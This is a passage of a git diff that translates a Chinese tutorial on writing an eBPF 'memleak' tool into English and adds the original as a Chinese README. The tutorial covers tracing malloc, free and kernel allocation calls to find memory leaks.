`bpf_get_current_pid_tgid` function to retrieve the current process's PID. Note that the PID here is actually a combination of the process ID and thread ID, and we shift it right by 32 bits to get the actual process ID. -函数接下来更新 `sizes` 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。`BPF_ANY` 表示如果 key 已存在,那么更新 value,否则就新建一个条目。 +The function then updates the `sizes` map, which uses the process ID as the key and the requested memory allocation size as the value. `BPF_ANY` indicates that if the key already exists, the value will be updated; otherwise, a new entry will be created. -最后,如果启用了 `trace_all` 标志,函数将打印一条信息,说明发生了内存分配。 +Finally, if the `trace_all` flag is enabled, the function will print a message indicating that a memory allocation has occurred. -`BPF_KPROBE` 宏用于 - -最后定义了 `BPF_KPROBE(malloc_enter, size_t size)`,它会在 `malloc` 函数被调用时被 BPF uprobe 拦截执行,并通过 `gen_alloc_enter` 来记录内存分配大小。 -我们刚刚分析了内存分配的入口函数 `gen_alloc_enter`,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 `gen_alloc_exit2` 函数以及如何从内存分配调用中获取返回的内存地址。 +The `BPF_KPROBE` macro is used to intercept the execution of the `malloc` function with a BPF uprobe when the `malloc_enter` function is called, and it records the memory allocation size using `gen_alloc_enter`. +We have just analyzed the entry function `gen_alloc_enter` of memory allocation, now let's focus on the exit part of this process. Specifically, we will discuss the `gen_alloc_exit2` function and how to obtain the returned memory address from the memory allocation call. ```c static int gen_alloc_exit2(void *ctx, u64 address) @@ -232,8 +228,7 @@ static int gen_alloc_exit2(void *ctx, u64 address) __builtin_memset(&info, 0, sizeof(info)); - info.size = *size; - bpf_map_delete_elem(&sizes, &pid); + info.size = *size;bpf_map_delete_elem(&sizes, &pid); if (address != 0) { info.timestamp_ns = bpf_ktime_get_ns(); @@ -252,6 +247,7 @@ static int gen_alloc_exit2(void *ctx, u64 address) return 0; } + static int gen_alloc_exit(struct pt_regs *ctx) { return gen_alloc_exit2(ctx, PT_REGS_RC(ctx)); @@ -264,18 +260,19 @@ int BPF_KRETPROBE(malloc_exit) } ``` -`gen_alloc_exit2` 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 `ctx`,另一个是内存分配函数返回的内存地址 `address`。 +`gen_alloc_exit2` function is called when the memory allocation operation is completed. This function takes two parameters, one is the context `ctx` and the other is the memory address returned by the memory allocation function `address`. -首先,它获取当前线程的 PID,然后使用这个 PID 作为键在 `sizes` 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。 +First, it obtains the PID (Process ID) of the current thread and uses it as a key to look up the corresponding memory allocation size in the `sizes` map. If not found (i.e., no entry for the memory allocation operation), the function simply returns. -接着,函数清除 `info` 结构体的内容,并设置它的 `size` 字段为之前在 map 中找到的内存分配大小。并从 `sizes` 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。 +Then, it clears the content of the `info` structure and sets its `size` field to the memory allocation size found in the map. It also removes the corresponding element from the `sizes` map because the memory allocation operation has completed and this information is no longer needed. -接下来,如果 `address` 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 `info` 结构体中,并随后更新到 `allocs` 这个 map 中。 +Next, if `address` is not zero (indicating a successful memory allocation operation), the function further collects some additional information. First, it obtains the current timestamp as the completion time of the memory allocation and fetches the current stack trace. These pieces of information are stored in the `info` structure and subsequently updated in the `allocs` map. -最后,函数调用 `update_statistics_add` 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。 +Finally, the function calls `update_statistics_add` to update the statistics data and, if tracing of all memory allocation operations is enabled, it prints some information about the memory allocation operation. -请注意,`gen_alloc_exit` 函数是 `gen_alloc_exit2` 的一个包装,它将 `PT_REGS_RC(ctx)` 作为 `address` 参数传递给 `gen_alloc_exit2`。` -在我们的讨论中,我们刚刚提到在 `gen_alloc_exit2` 函数中,调用了 `update_statistics_add` 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。 +Note that, `gen_alloc_exit` is a wrapper for `gen_alloc_exit2`, which passes `PT_REGS_RC(ctx)` as the `address` parameter to `gen_alloc_exit2`. + +In our discussion, we just mentioned that `update_statistics_add` function is called in the `gen_alloc_exit2` function to update the statistics data for memory allocations. Now let's take a closer look at the implementation of this function. ```c static void update_statistics_add(u64 stack_id, u64 sz) @@ -295,68 +292,30 @@ static void update_statistics_add(u64 stack_id, u64 sz) } ``` -`update_statistics_add` 函数接收两个参数:当前的堆栈 ID `stack_id` 以及内存分配的大小 `sz`。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。 +The `update_statistics_add` function takes two parameters: the current stack ID `stack_id` and the size of the memory allocation `sz`. These two parameters are collected in the memory allocation event and used to update the statistics data for memory allocations.First, the function tries to find the element with the current stack ID as the key in the `combined_allocs` map. If it is not found, a new element is initialized with `initial_cinfo` (which is a default `combined_alloc_info` structure with all fields set to zero). -首先,函数尝试在 `combined_allocs` 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 `initial_cinfo`(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。 +Next, the function creates an `incremental_cinfo` and sets its `total_size` to the current memory allocation size and `number_of_allocs` to 1. This is because each call to the `update_statistics_add` function represents a new memory allocation event, and the size of this event's memory allocation is `sz`. -接着,函数创建一个 `incremental_cinfo`,并设置它的 `total_size` 为当前内存分配的大小,设置 `number_of_allocs` 为 1。这是因为每次调用 `update_statistics_add` 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 `sz`。 +Finally, the function atomically adds the value of `incremental_cinfo` to `existing_cinfo` using the `__sync_fetch_and_add` function. Note that this step is thread-safe, so even if multiple threads call the `update_statistics_add` function concurrently, each memory allocation event will be correctly recorded in the statistics. -最后,函数使用 `__sync_fetch_and_add` 函数原子地将 `incremental_cinfo` 的值加到 `existing_cinfo` 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 `update_statistics_add` 函数,每个内存分配事件也能正确地记录到统计数据中。 +In summary, the `update_statistics_add` function implements the logic for updating memory allocation statistics. By maintaining the total amount and number of memory allocations for each stack ID, we can gain insight into the memory allocation behavior of the program. -总的来说,`update_statistics_add` 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。 -在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在上述代码中,我们定义了一个名为 `update_statistics_del` 的函数,其作用是在内存释放时更新统计信息。而 `gen_free_enter` 函数则是在进程调用 `free` 函数时被执行。 +In our process of tracking memory allocation statistics, we not only need to count memory allocations but also consider memory releases. In the above code, we define a function called `update_statistics_del` that updates the statistics when memory is freed. The function `gen_free_enter` is executed when the process calls the `free` function. + +The `update_statistics_del` function takes the stack ID and the size of the memory block to be freed as parameters. First, the function uses the current stack ID as the key to look up the corresponding `combined_alloc_info` structure in the `combined_allocs` map. If it is not found, an error message is output and the function returns. If it is found, a `decremental_cinfo` `combined_alloc_info` structure is constructed with its `total_size` set to the size of the memory to be freed and `number_of_allocs` set to 1. Then the `__sync_fetch_and_sub` function is used to atomically subtract the value of `decremental_cinfo` from `existing_cinfo`. Note that the `number_of_allocs` here is negative, indicating a decrease in memory allocation. + +The `gen_free_enter` function takes the address to be freed as a parameter. It first converts the address to an unsigned 64-bit integer (`u64`). Then it looks up the `alloc_info` structure in the `allocs` map using the address as the key. If it is not found, the function returns 0. If it is found, the `alloc_info` structure is deleted from the `allocs` map, and the `update_statistics_del` function is called with the stack ID and size from `info`. If `trace_all` is true, an information message is output. ```c -static void update_statistics_del(u64 stack_id, u64 sz) -{ - union combined_alloc_info *existing_cinfo; - - existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id); - if (!existing_cinfo) { - bpf_printk("failed to lookup combined allocs\n"); - return; - } - - const union combined_alloc_info decremental_cinfo = { - .total_size = sz, - .number_of_allocs = 1 - }; - - __sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits); -} -``` - -`update_statistics_del` 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 `combined_allocs` 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 `combined_alloc_info` 结构体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 `decremental_cinfo` 的 `combined_alloc_info` 结构体,设置它的 `total_size` 为要释放的内存大小,设置 `number_of_allocs` 为 1。然后使用 `__sync_fetch_and_sub` 函数原子地从 `existing_cinfo` 中减去 `decremental_cinfo` 的值。请注意,这里的 `number_of_allocs` 是负数,表示减少了一个内存分配。 - -```c -static int gen_free_enter(const void *address) -{ - const u64 addr = (u64)address; - - const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr); - if (!info) - return 0; - - bpf_map_delete_elem(&allocs, &addr); - update_statistics_del(info->stack_id, info->size); - - if (trace_all) { - bpf_printk("free entered, address = %lx, size = %lu\n", - address, info->size); - } - - return 0; -} - -SEC("uprobe") int BPF_KPROBE(free_enter, void *address) { return gen_free_enter(address); } ``` -接下来看 `gen_free_enter` 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 `allocs` 这个 map 中使用这个地址作为键来查找对应的 `alloc_info` 结构体。如果找不到,那么就直接返回,因为这意味着这个地址并没有被分配过。如果找到了,那么就删除这个元素,并且调用 `update_statistics_del` 函数来更新统计数据。最后,如果启用了全局追踪,那么还会输出一条信息,包括这个地址以及它的大小。 -在我们追踪和统计内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。 +Next, let's look at the `gen_free_enter` function. It takes an address as a parameter, which is the result of memory allocation, i.e., the starting address of the memory to be freed. The function first uses this address as a key to search for the corresponding `alloc_info` structure in the `allocs` map. If it is not found, it simply returns because it means that this address has not been allocated. If it is found, the element is deleted, and the `update_statistics_del` function is called to update the statistics data. Finally, if global tracking is enabled, a message is also output, including this address and its size. + +While tracking and profiling memory allocation, we also need to track kernel-mode memory allocation and deallocation. In the Linux kernel, the `kmem_cache_alloc` function and the `kfree` function are used for kernel-mode memory allocation and deallocation, respectively. ```c SEC("tracepoint/kmem/kfree") @@ -376,7 +335,7 @@ int memleak__kfree(void *ctx) } ``` -上述代码片段定义了一个函数memleak__kfree,这是一个bpf程序,会在内核调用kfree函数时执行。首先,该函数检查是否存在kfree函数。如果存在,则会读取传递给kfree函数的参数(即要释放的内存块的地址),并保存到变量ptr中;否则,会读取传递给kmem_free函数的参数(即要释放的内存块的地址),并保存到变量ptr中。接着,该函数会调用之前定义的gen_free_enter函数来处理该内存块的释放。 +The above code snippet defines a function `memleak__kfree`. This is a BPF program that will be executed when the `kfree` function is called in the kernel. First, the function checks if `kfree` exists. If it does, it reads the argument passed to the `kfree` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Otherwise, it reads the argument passed to the `kmem_free` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Then, the function calls the previously defined `gen_free_enter` function to handle the release of this memory block. ```c SEC("tracepoint/kmem/kmem_cache_alloc") @@ -391,22 +350,21 @@ int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx) } ``` -这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。 +This code snippet defines a function `memleak__kmem_cache_alloc`. This is also a BPF program that will be executed when the `kmem_cache_alloc` function is called in the kernel. If the `wa_missing_free` flag is set, it calls the `gen_free_enter` function to handle possible missed release operations. Then, the function calls the `gen_alloc_enter` function to handle memory allocation and finally calls the `gen_alloc_exit2` function to record the allocation result. -这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。 +Both of these BPF programs use the `SEC` macro to define the corresponding tracepoints, so that they can be executed when the corresponding kernel functions are called. In the Linux kernel, a tracepoint is a static hook that can be inserted into the kernel to collect runtime kernel information. It is very useful for debugging and performance analysis. -在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。 +In the process of understanding this code, pay attention to the use of the `BPF_CORE_READ` macro. This macro is used to read kernel data in BPF programs. In BPF programs, we cannot directly access kernel memory and need to use such macros to safely read data. -### 用户态程序 +### User-Space Program -在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。 +After understanding the BPF kernel part, let's switch to the user-space program. The user-space program works closely with the BPF kernel program. It is responsible for loading BPF programs into the kernel, setting up and managing BPF maps, and handling data collected from BPF programs. The user-space program is longer, but here we can briefly refer to its mount point. ```c int attach_uprobes(struct memleak_bpf *skel) { ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter); - ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); - + ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter); ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit); @@ -425,7 +383,7 @@ int attach_uprobes(struct memleak_bpf *skel) ATTACH_UPROBE_CHECKED(skel, free, free_enter); ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter); - // the following probes are intentinally allowed to fail attachment + // the following probes are intentionally allowed to fail attachment // deprecated in libc.so bionic ATTACH_UPROBE(skel, valloc, valloc_enter); @@ -443,25 +401,27 @@ int attach_uprobes(struct memleak_bpf *skel) } ``` -在这段代码中,我们看到一个名为`attach_uprobes`的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。 +In this code snippet, we see a function called `attach_uprobes` that mounts uprobes (user space probes) onto memory allocation and deallocation functions. In Linux, uprobes are a kernel mechanism that allows setting breakpoints at arbitrary locations in user space programs, enabling precise observation and control over the behavior of user space programs. -这里,每个内存相关的函数都通过两个uprobes进行跟踪:一个在函数入口(enter),一个在函数退出(exit)。因此,每当这些函数被调用或返回时,都会触发一个uprobes事件,进而触发相应的BPF程序。 +Here, each memory-related function is traced using two uprobes: one at the entry (enter) of the function and one at the exit. Thus, every time these functions are called or return, a uprobes event is triggered, which in turn triggers the corresponding BPF program. -在具体的实现中,我们使用了`ATTACH_UPROBE`和`ATTACH_URETPROBE`两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。 +In the actual implementation, we use two macros, `ATTACH_UPROBE` and `ATTACH_URETPROBE`, to attach uprobes and uretprobes (function return probes), respectively. Each macro takes three arguments: the skeleton of the BPF program (skel), the name of the function to monitor, and the name of the BPF program to trigger. -这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。 +These mount points include common memory allocation functions such as malloc, calloc, realloc, mmap, posix_memalign, memalign, free, and their corresponding exit points. Additionally, we also observe some possible allocation functions such as valloc, pvalloc, aligned_alloc, although they may not always exist. -这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。 +The goal of these mount points is to capture all possible memory allocation and deallocation events, allowing our memory leak detection tool to obtain as comprehensive data as possible. This approach enables us to track not only memory allocation and deallocation but also their contextual information such as call stacks and invocation counts, helping us to pinpoint and fix memory leak issues. -注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。 +Note that some memory allocation functions may not exist or may have been deprecated, such as valloc and pvalloc. Thus, their attachment may fail. In such cases, we allow for attachment failures, which do not prevent the program from executing. This is because we are more focused on mainstream and commonly used memory allocation functions, while these deprecated functions are often used less frequently in practical applications. -完整的源代码: 关于如何安装依赖,请参考: +Complete source code: -## 编译运行 +Reference: + +## Compile and Run ```console $ make -$ sudo ./memleak +$ sudo ./memleak using default object: libc.so.6 using page size: 4096 tracing kernel: true @@ -478,12 +438,10 @@ Tracing outstanding memory allocs... Hit Ctrl-C to end ... ``` -## 总结 +## Summary -通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。 +Through this eBPF introductory tutorial, you have learned how to write a Memleak eBPF monitoring program to monitor memory leaks in real time. You have also learned about the application of eBPF in memory monitoring, how to write eBPF programs using the BPF API, create and use eBPF maps, and how to use eBPF tools to monitor and analyze memory leak issues. We have provided a detailed example to help you understand the execution flow and principles of eBPF code. -您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +You can visit our tutorial code repository at or website for more examples and complete tutorials. -接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。 - -参考资料: +> The original link of this article: diff --git a/src/16-memleak/README.zh.md b/src/16-memleak/README.zh.md new file mode 100644 index 0000000..0dfb2f4 --- /dev/null +++ b/src/16-memleak/README.zh.md @@ -0,0 +1,489 @@ +# eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏 + +eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 + +在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。 + +## 背景及其重要性 + +内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。 + +内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。 + +### 调试内存泄漏的挑战 + +调试内存泄漏问题是一项复杂且挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常在获取核心转储时需要暂停应用程序,或在应用程序终止后才能调用 free() 函数。 + +## eBPF 的作用 + +在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分 + +析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。 + +`memleak` eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,`memleak` 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令: + +```console +# ./memleak -p $(pidof allocs) +Attaching to pid 5193, Ctrl+C to quit. +[11:16:33] Top 2 stacks with outstanding allocations: + 80 bytes in 5 allocations from stack + main+0x6d [allocs] + __libc_start_main+0xf0 [libc-2.21.so] + +[11:16:34] Top 2 stacks with outstanding allocations: + 160 bytes in 10 allocations from stack + main+0x6d [allocs] + __libc_start_main+0xf0 [libc-2.21.so] +``` + +运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。 + +随着时间的推移,很显然,`allocs` 进程的 `main` 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。 + +## memleak 的实现原理 + +在基本层面上,`memleak` 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,`memleak` 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,`memleak` 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 `memleak` 能够准确地追踪到哪些内存块已被分配但未被释放。 + +对于用户态的常用内存分配函数,如 `malloc` 和 `calloc` 等,`memleak` 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +对于内核态的内存分配函数,如 `kmalloc` 等,`memleak` 则选择使用了 tracepoint 来实现监控。Tracepoint 是一种在 Linux 内核中提供的动态追踪技术,它可以在内核运行时动态地追踪特定的事件,而无需重新编译内核或加载内核模块。 + +## 内核态 eBPF 程序实现 + +## `memleak` 内核态 eBPF 程序实现 + +`memleak` 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 `memleak` 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。 + +```c +#ifndef __MEMLEAK_H +#define __MEMLEAK_H + +#define ALLOCS_MAX_ENTRIES 1000000 +#define COMBINED_ALLOCS_MAX_ENTRIES 10240 + +struct alloc_info { + __u64 size; // 分配的内存大小 + __u64 timestamp_ns; // 分配时的时间戳,单位为纳秒 + int stack_id; // 分配时的调用堆栈ID +}; + +union combined_alloc_info { + struct { + __u64 total_size : 40; // 所有未释放分配的总大小 + __u64 number_of_allocs : 24; // 所有未释放分配的总次数 + }; + __u64 bits; // 结构的位图表示 +}; + +#endif /* __MEMLEAK_H */ +``` + +这里定义了两个主要的数据结构:`alloc_info` 和 `combined_alloc_info`。 + +`alloc_info` 结构体包含了一个内存分配的基本信息,包括分配的内存大小 `size`、分配发生时的时间戳 `timestamp_ns`,以及触发分配的调用堆栈 ID `stack_id`。 + +`combined_alloc_info` 是一个联合体(union),它包含一个嵌入的结构体和一个 `__u64` 类型的位图表示 `bits`。嵌入的结构体有两个成员:`total_size` 和 `number_of_allocs`,分别代表所有未释放分配的总大小和总次数。其中 40 和 24 分别表示 total_size 和 number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。 + +接下来,`memleak` 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 `SEC(".maps")` 的形式定义,表示它们属于 eBPF 程序的映射部分。 + +```c +const volatile size_t min_size = 0; +const volatile size_t max_size = -1; +const volatile size_t page_size = 4096; +const volatile __u64 sample_rate = 1; +const volatile bool trace_all = false; +const volatile __u64 stack_flags = 0; +const volatile bool wa_missing_free = false; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, pid_t); + __type(value, u64); + __uint(max_entries, 10240); +} sizes SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, u64); /* address */ + __type(value, struct alloc_info); + __uint(max_entries, ALLOCS_MAX_ENTRIES); +} allocs SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, u64); /* stack id */ + __type(value, union combined_alloc_info); + __uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES); +} combined_allocs SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __type(key, u64); + __type(value, u64); + __uint(max_entries, 10240); +} memptrs SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_STACK_TRACE); + __type(key, u32); +} stack_traces SEC(".maps"); + +static union combined_alloc_info initial_cinfo; +``` + +这段代码首先定义了一些可配置的参数,如 `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags` 和 `wa_missing_free`,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。 + +接着定义了五个映射: + +1. `sizes`:这是一个哈希类型的映射,键为进程 ID,值为 `u64` 类型,存储每个进程的分配大小。 +2. `allocs`:这也是一个哈希类型的映射,键为分配的地址,值为 `alloc_info` 结构体,存储每个内存分配的详细信息。 +3. `combined_allocs`:这是另一个哈希类型的映射,键为堆栈 ID,值为 `combined_alloc_info` 联合体,存储所有未释放分配的总大小和总次数。 +4. `memptrs`:这也是一个哈希类型的映射,键和值都为 `u64` 类型,用于在用户空间和内核空间之间传递内存指针。 +5. `stack_traces`:这是一个堆栈追踪类型的映射,键为 `u32` 类型,用于存储堆栈 ID。 + +以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 `malloc`, `free`, `calloc`, `realloc`, `mmap` 和 `munmap`,以便在调用这些函数时进行数据记录。在用户态,`memleak` 主要使用了 uprobes 技术进行挂载。 + +每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。 + +这里,`gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。 + +函数原型示例如下: + +```c +SEC("uprobe") +int BPF_KPROBE(malloc_enter, size_t size) +{ + // 记录分配开始的相关信息 + return gen_alloc_enter(size); +} + +SEC("uretprobe") +int BPF_KRETPROBE(malloc_exit) +{ + // 记录分配结束的相关信息 + return gen_alloc_exit(ctx); +} + +SEC("uprobe") +int BPF_KPROBE(free_enter, void *address) +{ + // 记录释放开始的相关信息 + return gen_free_enter(address); +} +``` + +其中,`malloc_enter` 和 `free_enter` 是分别挂载在 `malloc` 和 `free` 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 `malloc_exit` 则是挂载在 `malloc` 函数的返回处的探针,用于记录函数的返回值。 + +这些函数使用了 `BPF_KPROBE` 和 `BPF_KRETPROBE` 这两个宏来声明,这两个宏分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)。具体来说,kprobe 用于在函数调用时触发,而 kretprobe 则是在函数返回时触发。 + +`gen_alloc_enter` 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。 + +```c +static int gen_alloc_enter(size_t size) +{ + if (size < min_size || size > max_size) + return 0; + + if (sample_rate > 1) { + if (bpf_ktime_get_ns() % sample_rate != 0) + return 0; + } + + const pid_t pid = bpf_get_current_pid_tgid() >> 32; + bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY); + + if (trace_all) + bpf_printk("alloc entered, size = %lu\n", size); + + return 0; +} + +SEC("uprobe") +int BPF_KPROBE(malloc_enter, size_t size) +{ + return gen_alloc_enter(size); +} +``` + +首先,`gen_alloc_enter` 函数接收一个 `size` 参数,这个参数表示请求分配的内存的大小。如果这个值不在 `min_size` 和 `max_size` 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。 + +接下来,函数检查采样率 `sample_rate`。如果 `sample_rate` 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 `bpf_ktime_get_ns` 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。 + +之后,函数使用 `bpf_get_current_pid_tgid` 函数获取当前进程的 PID。注意这里的 PID 实际上是进程和线程的组合 ID,我们通过右移 32 位来获取真正的进程 ID。 + +函数接下来更新 `sizes` 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。`BPF_ANY` 表示如果 key 